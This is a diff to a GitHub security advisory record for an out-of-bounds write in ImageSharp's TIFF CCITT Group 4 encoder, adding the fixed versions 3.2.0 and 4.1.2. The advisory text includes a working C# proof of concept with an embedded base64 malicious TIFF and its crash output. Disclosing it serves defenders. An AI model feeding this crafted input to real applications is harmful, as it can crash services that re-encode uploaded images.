diff --git a/advisories/github-reviewed/2026/10/GHSA-jjfr-hcj7-qf5w/GHSA-jjfr-hcj7-qf5w.json b/advisories/github-reviewed/2026/10/GHSA-jjfr-hcj7-qf5w/GHSA-jjfr-hcj7-qf5w.json index 9074f397959..1d7cf33b5ae 100644 --- a/advisories/github-reviewed/2026/10/GHSA-jjfr-hcj7-qf5w/GHSA-jjfr-hcj7-qf5w.json +++ b/advisories/github-reviewed/2026/10/GHSA-jjfr-hcj7-qf5w/GHSA-jjfr-hcj7-qf5w.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-jjfr-hcj7-qf5w", - "modified": "2026-10-07T20:24:46Z", + "modified": "2026-10-07T20:24:49Z", "published": "2026-10-07T20:24:46Z", "aliases": [ "CVE-2026-106115" ], "summary": "ImageSharp: TIFF CCITT T6 encoder writes beyond an undersized output buffer", - "details": "### Summary\n\nThe TIFF CCITT Group 4 (T6) encoder writes beyond its logical compressed-data buffer when encoding a 1-bit image. A valid 1×1 Group 4 TIFF decoded and re-encoded with the default `TiffEncoder` terminates the process with an unhandled exception.\n\n### Affected package and versions\n\n- Package: `SixLabors.ImageSharp` (NuGet)\n- Affected range: `>= 2.1.0, <= 4.1.1`\n- Commit `0815358f9202a78bc7f3b83e19282dc3654b500f` corresponds to release **v4.1.1**.\n\nThe T6 compressor was introduced by commit `3c9eb470a07a15012c2a29ad84090dcc804a7975`, first released in v2.1.0, with the same `Width * rowsPerStrip` allocation and unchecked code writes. The 1×1 exploit terminates published v2.1.0 and v4.1.1; its uncompressed control succeeds. Source history shows no capacity fix through v4.1.1.\n### Details\n\n[`TiffCcittCompressor.Initialize`](https://github.com/SixLabors/ImageSharp/blob/0815358f9202a78bc7f3b83e19282dc3654b500f/src/ImageSharp/Formats/Tiff/Compression/Compressors/TiffCcittCompressor.cs#L527-L532) allocates `Width * rowsPerStrip` bytes. A 1×1 strip therefore receives one byte.\n\nAfter encoding the row, [`T6BitCompressor.CompressStrip`](https://github.com/SixLabors/ImageSharp/blob/0815358f9202a78bc7f3b83e19282dc3654b500f/src/ImageSharp/Formats/Tiff/Compression/Compressors/T6BitCompressor.cs#L53-L131) appends two 12-bit EOFB codes. [`WriteCode`](https://github.com/SixLabors/ImageSharp/blob/0815358f9202a78bc7f3b83e19282dc3654b500f/src/ImageSharp/Formats/Tiff/Compression/Compressors/TiffCcittCompressor.cs#L466-L479) writes those bits without checking the destination capacity. The final checked slice detects the oversized byte count and throws `ArgumentOutOfRangeException`, after the unchecked writes have exceeded the one-byte span.\n\nThe default TIFF encoder can inherit `CcittGroup4Fax` and 1-bit settings from decoded frame metadata. The reproduction uses that decode-and-re-encode path.\n\n### Tested environment\n\n- Published NuGet package: `SixLabors.ImageSharp` 4.1.1\n- Target framework: `net8.0`\n- .NET SDK: 8.0.424\n- .NET runtime: 8.0.30\n- Operating system: Debian GNU/Linux 12, ARM64, Docker\n\nNo active exploitation is known.\n\n### Reproduction\n\nCreate a `net8.0` project referencing the published 4.1.1 assembly and use this `Program.cs`:\n\n```csharp\nusing SixLabors.ImageSharp;\nusing SixLabors.ImageSharp.Formats.Tiff;\nusing SixLabors.ImageSharp.Formats.Tiff.Constants;\n\nstring mode = args.FirstOrDefault() ?? \"exploit\";\nbyte[] input = Convert.FromBase64String(\n \"SUkqAAgAAAAJAAABAwABAAAAAQAAAAEBAwABAAAAAQAAAAIBAwABAAAAAQAAAAMBAwABAAAABAAAAAYBAwABAAAAAAAAABEBBAABAAAAegAAABUBAwABAAAAAQAAABYBBAABAAAAAQAAABcBBAABAAAABAAAAAAAAACACACA\");\n\nusing Image image = Image.Load(input);\nvar metadata = image.Frames.RootFrame.Metadata.GetTiffMetadata();\nConsole.WriteLine($\"ImageSharp={typeof(Image).Assembly.GetName().Version}\");\nConsole.WriteLine($\"mode={mode} decoded={image.Width}x{image.Height} compression={metadata.Compression} bits={metadata.BitsPerPixel}\");\n\nusing var output = new MemoryStream();\nif (mode == \"control\")\n{\n image.Save(output, new TiffEncoder { Compression = TiffCompression.None });\n}\nelse\n{\n image.Save(output, new TiffEncoder());\n}\n\nConsole.WriteLine($\"encoded=True bytes={output.Length}\");\n```\n\nRun:\n\n```text\ndotnet run -- exploit\ndotnet run -- control\n```\n\nThe exploit produced exit code 134:\n\n```text\nImageSharp=4.0.0.0\nmode=exploit decoded=1x1 compression=CcittGroup4Fax bits=Bit1\nUnhandled exception. System.ArgumentOutOfRangeException: Specified argument was out of the range of valid values.\n at SixLabors.ImageSharp.Formats.Tiff.Compression.Compressors.TiffCcittCompressor.CompressStrip(Span`1 rows, Int32 height)\n```\n\nThe control completed with exit code 0:\n\n```text\nImageSharp=4.0.0.0\nmode=control decoded=1x1 compression=CcittGroup4Fax bits=Bit1\nencoded=True bytes=212\n```\n\n### Impact\n\nOne attacker-supplied Group 4 TIFF can select this unsafe encoder path when an application decodes it and re-encodes it with inherited TIFF metadata. The demonstrated result is an unhandled exception and process termination in the reproduction. The report is limited to the T6 encoder path.", + "details": "### Patched versions\n\nFixed in ImageSharp **3.2.0** and **4.1.2**. Users on v3 should upgrade to 3.2.0; users on v4 should upgrade to 4.1.2 or later.\n\n### Summary\n\nThe TIFF CCITT Group 4 (T6) encoder writes beyond its logical compressed-data buffer when encoding a 1-bit image. A valid 1×1 Group 4 TIFF decoded and re-encoded with the default `TiffEncoder` terminates the process with an unhandled exception.\n\n### Affected package and versions\n\n- Package: `SixLabors.ImageSharp` (NuGet)\n- Affected ranges: `>= 2.1.0, < 3.2.0` and `>= 4.0.0, < 4.1.2`\n- Commit `0815358f9202a78bc7f3b83e19282dc3654b500f` corresponds to release **v4.1.1**.\n\nThe T6 compressor was introduced by commit `3c9eb470a07a15012c2a29ad84090dcc804a7975`, first released in v2.1.0, with the same `Width * rowsPerStrip` allocation and unchecked code writes. The 1×1 exploit terminates published v2.1.0 and v4.1.1; its uncompressed control succeeds. Source history shows no capacity fix through v4.1.1.\n### Details\n\n[`TiffCcittCompressor.Initialize`](https://github.com/SixLabors/ImageSharp/blob/0815358f9202a78bc7f3b83e19282dc3654b500f/src/ImageSharp/Formats/Tiff/Compression/Compressors/TiffCcittCompressor.cs#L527-L532) allocates `Width * rowsPerStrip` bytes. A 1×1 strip therefore receives one byte.\n\nAfter encoding the row, [`T6BitCompressor.CompressStrip`](https://github.com/SixLabors/ImageSharp/blob/0815358f9202a78bc7f3b83e19282dc3654b500f/src/ImageSharp/Formats/Tiff/Compression/Compressors/T6BitCompressor.cs#L53-L131) appends two 12-bit EOFB codes. [`WriteCode`](https://github.com/SixLabors/ImageSharp/blob/0815358f9202a78bc7f3b83e19282dc3654b500f/src/ImageSharp/Formats/Tiff/Compression/Compressors/TiffCcittCompressor.cs#L466-L479) writes those bits without checking the destination capacity. The final checked slice detects the oversized byte count and throws `ArgumentOutOfRangeException`, after the unchecked writes have exceeded the one-byte span.\n\nThe default TIFF encoder can inherit `CcittGroup4Fax` and 1-bit settings from decoded frame metadata. The reproduction uses that decode-and-re-encode path.\n\n### Tested environment\n\n- Published NuGet package: `SixLabors.ImageSharp` 4.1.1\n- Target framework: `net8.0`\n- .NET SDK: 8.0.424\n- .NET runtime: 8.0.30\n- Operating system: Debian GNU/Linux 12, ARM64, Docker\n\nNo active exploitation is known.\n\n### Reproduction\n\nCreate a `net8.0` project referencing the published 4.1.1 assembly and use this `Program.cs`:\n\n```csharp\nusing SixLabors.ImageSharp;\nusing SixLabors.ImageSharp.Formats.Tiff;\nusing SixLabors.ImageSharp.Formats.Tiff.Constants;\n\nstring mode = args.FirstOrDefault() ?? \"exploit\";\nbyte[] input = Convert.FromBase64String(\n \"SUkqAAgAAAAJAAABAwABAAAAAQAAAAEBAwABAAAAAQAAAAIBAwABAAAAAQAAAAMBAwABAAAABAAAAAYBAwABAAAAAAAAABEBBAABAAAAegAAABUBAwABAAAAAQAAABYBBAABAAAAAQAAABcBBAABAAAABAAAAAAAAACACACA\");\n\nusing Image image = Image.Load(input);\nvar metadata = image.Frames.RootFrame.Metadata.GetTiffMetadata();\nConsole.WriteLine($\"ImageSharp={typeof(Image).Assembly.GetName().Version}\");\nConsole.WriteLine($\"mode={mode} decoded={image.Width}x{image.Height} compression={metadata.Compression} bits={metadata.BitsPerPixel}\");\n\nusing var output = new MemoryStream();\nif (mode == \"control\")\n{\n image.Save(output, new TiffEncoder { Compression = TiffCompression.None });\n}\nelse\n{\n image.Save(output, new TiffEncoder());\n}\n\nConsole.WriteLine($\"encoded=True bytes={output.Length}\");\n```\n\nRun:\n\n```text\ndotnet run -- exploit\ndotnet run -- control\n```\n\nThe exploit produced exit code 134:\n\n```text\nImageSharp=4.0.0.0\nmode=exploit decoded=1x1 compression=CcittGroup4Fax bits=Bit1\nUnhandled exception. System.ArgumentOutOfRangeException: Specified argument was out of the range of valid values.\n at SixLabors.ImageSharp.Formats.Tiff.Compression.Compressors.TiffCcittCompressor.CompressStrip(Span`1 rows, Int32 height)\n```\n\nThe control completed with exit code 0:\n\n```text\nImageSharp=4.0.0.0\nmode=control decoded=1x1 compression=CcittGroup4Fax bits=Bit1\nencoded=True bytes=212\n```\n\n### Impact\n\nOne attacker-supplied Group 4 TIFF can select this unsafe encoder path when an application decodes it and re-encodes it with inherited TIFF metadata. The demonstrated result is an unhandled exception and process termination in the reproduction. The report is limited to the T6 encoder path.", "severity": [ { "type": "CVSS_V3", @@ -27,15 +27,31 @@ { "introduced": "2.1.0" }, + { + "fixed": "3.2.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "SixLabors.ImageSharp" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, { "fixed": "4.1.2" } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 4.1.1" - } + ] } ], "references": [